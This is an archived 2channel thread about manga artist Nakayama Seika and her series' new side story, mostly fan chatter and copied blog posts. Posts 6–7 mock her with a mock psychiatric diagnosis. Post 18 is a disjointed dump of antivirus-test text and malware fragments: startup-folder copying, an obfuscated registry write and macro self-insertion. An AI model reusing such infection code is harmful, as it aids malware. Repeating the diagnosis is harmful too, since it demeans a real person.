2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

中山星香 ★ 第25部

1 :Ballad.1旅立ち:2007/01/24(水) 16:19:42 ID:???0
公式掲示板ではとても言えない正直な気持ちはどうぞコチラに。
所詮はトイレの落書き同然ですが、思いの丈をぶつけましょう。

【お約束】
・他サイトへは2chの話題は持ち出さない。URLの貼付けも厳禁!
・踊り子さんへは手を触れないこと。
 喫茶店への書き込みは自己責任で、乗り込み報告は不要です。

【お願い】2ちゃんねるへ初めて来たお客様へ
>>2-5をお読みいただいた上で、ご参加願います。
(過去スレ一覧もこちらに)

【資料】 plaza.rakuten.co.jp/stardictionary/
(スレ用語辞典、PC顔文字辞書、ルビ辞典、あとがき抜粋、他)

2 :注目の少年の正体とは…:2007/01/24(水) 16:20:24 ID:???0
【2ちゃんねるへ初めて来たお客様へ】

遥々とリンクを辿って、どうぞいらっしゃいませ。
まずは「2ちゃんねるガイド(http://www.2ch.net/guide/)」を
お読みになり、ここの約束事をお守りください。
他板や他スレッドも覗いて、大体の雰囲気を掴むのも良いでしょう。
少々荒っぽい雰囲気なのが、お分かり頂けるかと思います。
先生を救うため!などという正義感で、風紀を正そうとすると、
余計に先生の評判を悪くすることにもなりかねません。
肌に合わない場合は無理をなされず、2度とここへは訪れない事をオススメします。
十人十色、様々な感想を持つ人が存在することを、ご理解頂ければ幸いです。

3 :ロビンの名の由来は…:2007/01/24(水) 16:21:05 ID:???0
【過去スレご案内】でも、過去ログへの旅は強要しません(藁)
読めないログは、みみずんキャッシュでノ
中山星香!
http://salad.2ch.net/gcomic/kako/987/987246262.html
中山星香 ☆ 第2部
http://salad.2ch.net/gcomic/kako/991/991207080.html
☆ 中山星香 ☆ 第3部
http://comic.2ch.net/gcomic/kako/997/997117863.html
☆ 中山星香 ☆ 第4部
http://comic.2ch.net/test/read.cgi/gcomic/1011884815
中山星香 ☆ 第5部
http://comic.2ch.net/test/read.cgi/gcomic/1018188404/
中山星香 ☆ 第6部
http://comic.2ch.net/gcomic/kako/1024/10241/1024166598.html
中山星香 ☆ 第7部
http://comic.2ch.net/gcomic/kako/1030/10308/1030853355.html
中山星香 ★ 第8部
http://comic.2ch.net/gcomic/kako/1034/10342/1034218719.html
中山星香 ★ 第9部
http://comic.2ch.net/gcomic/kako/1037/10375/1037525341.html
中山星香 ★ 第10部
http://comic.2ch.net/gcomic/kako/1044/10446/1044683981.html

4 :伏線解消は…:2007/01/24(水) 16:21:47 ID:???0
中山星香 ★ 第11部
http://comic.2ch.net/test/read.cgi/gcomic/1052541695/
中山星香 ★ 第12部
http://comic.2ch.net/test/read.cgi/gcomic/1064826466/
中山星香 ★ 第13部
http://comic4.2ch.net/test/read.cgi/gcomic/1075464371/
中山星香 ★ 第14部
http://comic6.2ch.net/test/read.cgi/gcomic/1088395074/
中山星香 ★ 第15部
http://comic6.2ch.net/test/read.cgi/gcomic/1099797373/
中山星香 ★ 第16部
http://comic6.2ch.net/test/read.cgi/gcomic/1113409303/
中山星香 ★ 第17部
http://comic6.2ch.net/test/read.cgi/gcomic/1122896493/
中山星香 ★ 第18部
http://comic6.2ch.net/test/read.cgi/gcomic/1129093030/
中山星香 ★ 第19部
http://comic6.2ch.net/test/read.cgi/gcomic/1133702756/
中山星香 ★ 第20部
http://comic6.2ch.net/test/read.cgi/gcomic/1144518824/

5 :次回は若き王と風の都:2007/01/24(水) 16:22:24 ID:???0
中山星香 ★ 第20部(※第21部)
http://comic6.2ch.net/test/read.cgi/gcomic/1152100864
中山星香 ★ 第22部
http://comic6.2ch.net/test/read.cgi/gcomic/1158459064/
中山星香 ★ 第23部
http://comic6.2ch.net/test/read.cgi/gcomic/1160549700/
中山星香 ★ 第24部
http://comic7.2ch.net/test/read.cgi/gcomic/1163400636/

6 :おまけ1/2:2007/01/24(水) 16:23:06 ID:???0
自己愛性人格障害の診断
ttp://lulu-web.com/pd-jikoai-d.html

1)自己の重要性に関する誇大な感覚
  ★トールキンの継承者

2)限りない成功、権力、才気、美しさ、あるいは理想的な恋
  の空想にとらわれている
  ★日本随一のFT作家であり、すぐパクリ作家の標的となる。

3)自分が「特別」であり、特異であり、他の特別なまたは地
  位の高い人たち(または団体)にしか理解されない、また
  は関係があるべきだ、と信じている。
  ★映像作家(自称)
  少女感性が欠如した、永遠の少年(自称)
  まんじゃぱへの傾倒。
  作品が認められないのは、凡庸な編集とお@鹿な読者らの
  読解力の低下が原因。

4)過剰な賞賛を求める。
  ★WTでの一切の批評、批判を受け付けない。それを行った
  者はすべて荒らしと認定。

7 :おまけ2/2:2007/01/24(水) 16:23:38 ID:???0
5)特権意識、つまり、特別有利な取り計らい、または自分の
  期待に自動的に従うことを理由もなく期待する。
  ★多忙のため、まんが甲子園の一時審査はパス。
  まんが甲子園の審査員なため、〆切は守らない。
  お土産をくれるティーファクトリーへ、足繁く通う。

6)対人関係で相手を不当に利用する、つまり、自分自身の目
  的を達成するために他者を利用する。
  ★アシスタントに猫の世話や庭の手入れをさせる。
  親友Mのパーティで、自分が聞きたいだけの英国の古楽を
  プレゼント。他の誰にも聞いてもらえず、逆ギレ。

7)共感の欠如:他人の気持ちおよび欲求を理解しようとしな
  い、またはそれに気づこうとしない。
  ★ファンを幻滅させる言動ばかり取る。その筆頭は著書紹介文。

8)しばしば他人に嫉妬する、または他人が自分に嫉妬してい
  ると思い込む。
  ★目の上のたんこぶは、H川御大。

9)尊大で傲慢な行動または態度。
  ★HPはバーチャルハウスで、家主は私。気に入らなければ帰れ。

  障害なんです。だから優しく見守ってあげてね(ハート

8 :毎度、三串より昨夜のネタですが:2007/01/24(水) 17:15:59 ID:???0
2007年01月23日19:25 『寝た・・・(-_-;)』
昨日はTea−Factryで卵野菜サンドとルフナで夕食して、
店長さまのサービスのマサラティーを堪能して戻りました、
帰りに馬臼君のリクエストのヤンマガをげっとしたりして帰宅
治療院での見立ては疲れ目による肩凝りから胃に降りて来ていた
みたいです。流石に一晩ですっきり。
今日は寝たり起きたりしつつ「天と地と」を読了、その後勢いで
馬臼君の差し入れの今月の別マとヤンマガのニ週分も読んで、
中休みなので、いっぱい眠りました、当然起きたら夜です(-_-;)。
激しく夜になってしましました(-_-;)。
睡眠不足は解消されましたが一日も無くなりました。
明日はネームの残りをやらなくっちゃな。
しかし本を読むのも目を使っちゃうしジレンマだな。
-----------------------------------------------
2007年01月23日19:23   (他のタイトルの中のメッセージ)
××様、その内にといっても後日編が終わった後で、完結祝いをやろうかしら
と思っています、春過ぎになるかもですが、夏の締め切りラッシュ前に
間に合って万一お暇でしたら是非御列席下さい(^▽^)ノ
△△様、いっぱい寝ましたら案の定・・・外が暗いです(^-^;A
危険なお休み進行中(^-^;A


本日はまだ布団の中でしょうねw

9 :花と名無しさん:2007/01/24(水) 17:24:41 ID:???0
>1、乙です。

三串の、夏の締め切りラッシュって…何?
花冠続編とか、新作とか?

10 :花と名無しさん:2007/01/24(水) 17:31:40 ID:???0
>>9
コピペしながら漏れにも疑問が…。
花冠は、いつ続編を始めるつもりなのか?
でも今回、間を空けず、夭逝後日談を掲載する事を★が望んで
いたような呪い日記が続いてたから、花冠が濃厚だろうね。
---------------------------
1/16発売「姫金」2月号より、掲載されたページの欄外(編集の宣伝)や
気になった文言等ピックアップ

注目の番外編!!「妖精国[アルフヘイム]の騎士 Ballad」
★開始前から大反響!! あの「妖精国の騎士」の後日譚!!

バカ兄→DQN姫に渡った月光石[ムーンストーン]の小刀[ルビ:ナイフ]

「時の谷」へ向け、旅立った二人を待ち受けていたのは…!!
★単行本最新刊「妖精国の騎士」54巻(完結)は絶賛発売中です!!

↑()で完結と必ず入れているのが、ヲチ的にワロスww

11 :花と名無しさん:2007/01/24(水) 17:40:21 ID:???0
>>1
乙カレー

12 :花と名無しさん:2007/01/24(水) 17:41:37 ID:???0
開始前からの大反響かw

まぁ、確かにここでは大反響だなw

前スレ埋め糸冬 了..._〆(゚▽゚*)

13 :花と名無しさん:2007/01/24(水) 17:58:11 ID:???O
今回の後日編1の理解不能な突然降って湧いた新事実ってのは
あぴぃるに載った旅立ち前夜編を読めば少しはわかるのかな?
あぴぃる手に入れた方いらしたらネダバレお願いします!

14 :花と名無しさん:2007/01/24(水) 18:04:04 ID:???0
<DQN姫の花咲王子との会話後、脳内/モノローグ>

―貴方が傍にいてくださる限り不幸なことは何もないですアーサー―
―でも これはけして貴方には言えないこと ………―
―時の谷について… 輝睡蓮の女神[ヴィレイドゥル・ディリイ]の言葉の発現を見たら……―
―光源[ファイアール]に向かう道は一人で行く―
―だからそれまで 二人で歩むこの旅は 私にとって神の贈り物だ―

<捨てられた子供/アーサー・ロビン一世の捜索中に出現した動植物/魔物?>
?蟇[ルビ:ガリ]
白野薔薇[ルビ:ローゼル]

メモ帳で字ずらを調べた時には表記されたけど、ネット上ではダメかも…。
ガリの、ガ→[虫]へんに、[刺]と言う字を使ってた/リ→単独では、ひきがえるらしい。

★からの〆の言葉/次回予告
『次は若き王と風の都[アルトディアス]びお話をお届けいたします』

欄外→次は5月号に掲載
次ページ・54巻広告での宣伝文句
「長期連載で人気を博したファンタジーの傑作!! ついに感動の完結巻!!」

15 :花と名無しさん:2007/01/24(水) 18:10:21 ID:???0
ラストのコマで、バカ兄が★の口グセを発していて唖然…!

バカ兄(少し笑顔っぽい):「久々にたくさん眠ったら頭が痛いぞ」
ファンラント(笑顔):「よかったじゃありませんか」

個人的にこのセリフを王さまが発するのは、
馬鹿の証明のようで禿しく鬱だ…('A`)

16 :花と名無しさん:2007/01/24(水) 18:36:06 ID:???0
突然スマソ
アーサーの「敬語禁止」「謝るの禁止」ってどこに出てたの?
漫画喫茶で54巻まで読んだつもりだったけど見落としてたかな

17 :花と名無しさん:2007/01/24(水) 18:37:20 ID:???0
>>16
最新姫金の後日譚です。まだゴミクズ化してない。

18 :花と名無しさん:2007/01/24(水) 19:30:03 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


19 :花と名無しさん:2007/01/24(水) 20:31:18 ID:???0
>>17
ありがとう。

20 :花と名無しさん:2007/01/24(水) 22:13:03 ID:???0
初代がローゼルを利用していたってのは
練りーにがローゼルが好きってのと
DQN姫の名前をかけ合わせているいるんだろうなーと考えたけど
お馬鹿な読者のスイカな私が考えられる浅はかな話なんか★は作らないよね。

>>15
★の生活をそのままローラントに使ったのか・・・orz
もうキャラ壊すのやめてくれw

13 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)